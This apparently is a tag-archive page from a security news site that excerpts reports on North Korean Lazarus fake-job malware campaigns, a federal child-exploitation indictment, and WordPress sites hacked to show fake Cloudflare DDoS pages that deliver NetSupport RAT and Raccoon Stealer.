Tag: distribute | Page 2

North Korean hackers offer fake jobs to distribute malware

September 30, 2022/in Computer Security

Lazarus, a state-sponsored hacker group based in North Korea, is now using open-source software and creating fake jobs in order to spread malware, says Microsoft.

The well-known group of hackers is targeting many key industry sectors, such as technology, media entertainment, and defense, and it’s using many different kinds of software to carry out these attacks.

An image describing how the hacker group ZINC operates. — Microsoft

The next time you get a message on LinkedIn, you should be careful. Microsoft warns that the North Korea-based threat group has been actively using open-source software infected with trojans to attack industry professionals. Microsoft has determined that these social engineering attacks started in late April and continued until at least mid-September.

Lazarus, also referred to as ZINC, Labyrinth Chollima, and Black Artemis, is a state-sponsored military hacking group from North Korea. It’s said that it has been active since at least 2009, and since then it’s been responsible for a variety of large attacks, including phishing, ransomware campaigns, and more.

The group has been creating fake LinkedIn recruiter profiles and approaching suitable candidates with job offers at legitimate, existing companies. “Targets received outreach tailored to their profession or background and were encouraged to apply for an open position at one of several legitimate companies,” said Microsoft.

Once the victims were convinced to move the conversation over from LinkedIn to WhatsApp, which offers encrypted communication, the hackers moved on to the next step. During the WhatsApp conversation, the targets received infected software that allowed Lazarus to deploy malware on their systems.

The end goal for the hackers was to be able to steal sensitive information or obtain access to valuable networks. Aside from the malware — which was found in programs such as PuTTY, KiTTY, TightVNC, muPDF/Subliminal Recording, and Sumatra PDF Reader — the attacks were well-engineered on the social side of things, too, with LinkedIn profiles and companies picked to match the victim’s profession.

A depiction of a hacker breaking into a system via the use of code. — Getty Images

As noted by Bleeping Computer, ZINC has also carried out similar attacks by using fake social media personas to distribute malware….

Source…

Five Defendants Indicted in a Conspiracy to Distribute Child Pornography | USAO-SDFL

September 15, 2022/in Internet Security

Miami, Florida – A federal grand jury in West Palm Beach has charged five men with one count of conspiracy to distribute child pornography and multiple counts of distribution and solicitation of child pornography.

Anthony Wayne Santiago, 28, of Novi, MI; Jacob Dominic VanDyke, 25, of Muskegon, MI; Johnathan Scott Fleak, 32, of Pryor, OK; Aaron Ray Iuliano, 27, of Ravenna, OH; and Michael Paul Gianfrancesco, 39, of Livingston, TN, were members of a chat room predicated on the distribution of pornography of children under the age of 13 years.

According to the indictment, from September to October 2021, the five defendants entered and participated in a private online chat. These defendants all distributed and or solicited child pornography amongst more than 50 other individuals.

Juan Antonio Gonzalez, U.S. Attorney for the Southern District of Florida, Anthony Salisbury, Special Agent in Charge, Homeland Security Investigations (HSI), and Ric Bradshaw, Sheriff, Palm Beach County Sheriff’s Office (PBSO), made the announcement.

HSI Miami and PBSO investigated the case. Assistant U.S. Attorney Gregory Schiller is prosecuting the case.

This case was brought as part of Project Safe Childhood (PSC), a nationwide initiative launched in May 2006 by the Department of Justice to combat the growing epidemic of child sexual exploitation and abuse. Led by United States Attorneys’ Offices and the Criminal Division’s Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state, and local resources to locate, apprehend and prosecute individuals, who sexually exploit children, and to identify and rescue victims. For more information about the Project Safe Childhood initiative and for information regarding Internet safety, please visit www.justice.gov/psc.

An indictment contains mere allegations and defendants are innocent unless found guilty in a court of law.

Related court documents and information may be found on the website of the District Court for the Southern District of Florida at www.flsd.uscourts.gov or at http://pacer.flsd.uscourts.gov, under case number 22-cr-80127.

###

Source…

Hackers Using Fake DDoS Protection Pages to Distribute Malware

August 24, 2022/in Computer Security

WordPress sites are being hacked to display fraudulent Cloudflare DDoS protection pages that lead to the delivery of malware such as NetSupport RAT and Raccoon Stealer.

“A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which lead victims to download remote access trojan malware,” Sucuri’s Ben Martin said in a write-up published last week.

Distributed denial-of-service (DDoS) protection pages are essential browser verification checks designed to deter bot-driven unwanted and malicious traffic from eating up bandwidth and taking down websites.

The new attack vector involves hijacking WordPress sites to display fake DDoS protection pop-ups that, when clicked, ultimately lead to the download of a malicious ISO file (“security_install.iso”) to the victim’s systems.

This is achieved by injecting three lines of code into a JavaScript file (“jquery.min.js”), or alternatively into the active theme file of the website, which, in turn, loads heavily obfuscated JavaScript from a remote server.

“This JavaScript then communicates with a second malicious domain which loads more JavaScript that initiates the download prompt for the malicious .iso file,” Martin explained.

Following the download, users are prompted to enter a verification code generated from the so-called “DDoS Guard” application so as to entice the victim into opening the weaponized installer file and accessing the destination website.

While the installer does display a verification code to maintain the ruse, in reality, the file is a remote access trojan called NetSupport RAT, which is linked to the FakeUpdates (aka SocGholish) malware family and also covertly installs Raccoon Stealer, a credential-stealing trojan available for rent on underground forums.

The development is a sign that attackers are opportunistically co-opting these familiar security mechanisms in their own campaigns in a bid to trick unsuspecting website visitors into installing malware.

To mitigate such threats, website owners are required to place their sites behind a firewall, employ file integrity checks, and enforce two-factor authentication (2FA). Website visitors are also urged to turn on 2FA,…

Source…

WordPress sites being hacked with fake Cloudflare DDoS to distribute malware

August 20, 2022/in Computer Security

Image courtesy:wordpress.org

On Saturday, WordPress sites are being hacked for displaying fake Cloudflare DDoS protection pages to circulate malware that installs the NetSupport RAT and the RaccoonStealer password-stealing Trojan.

DDoS protection screens are commonplace on the internet, that protects sites from bots, pinging them with bogus requests which aim to overwhelm them with garbage traffic.

Internet users treat these welcome screens as an unavoidable short-term annoyance that keeps their favorite online resources protected from malicious operatives. Unfortunately, this familiarity serves as an excellent opportunity for malware campaigns, Bleeping Computer reports.

According to the reports by Sucuri, hackers are attacking poorly protected WordPress sites to add a heavily obscure JavaScript payload, displaying a fake Cloudflare protection DDoS screen.

In June 2022, Raccoon Stealer returned to operations when its authors released its second major version and made it available to cybercriminals under a subscription model.

Raccoon 2.0 targets passwords, cookies, auto-fill data, and credit cards saved on web browsers, a wide range of cryptocurrency wallets, and it also has the potential of performing file exfiltration and taking screenshots of the victim’s desktop.

Source…

Tag Archive for: distribute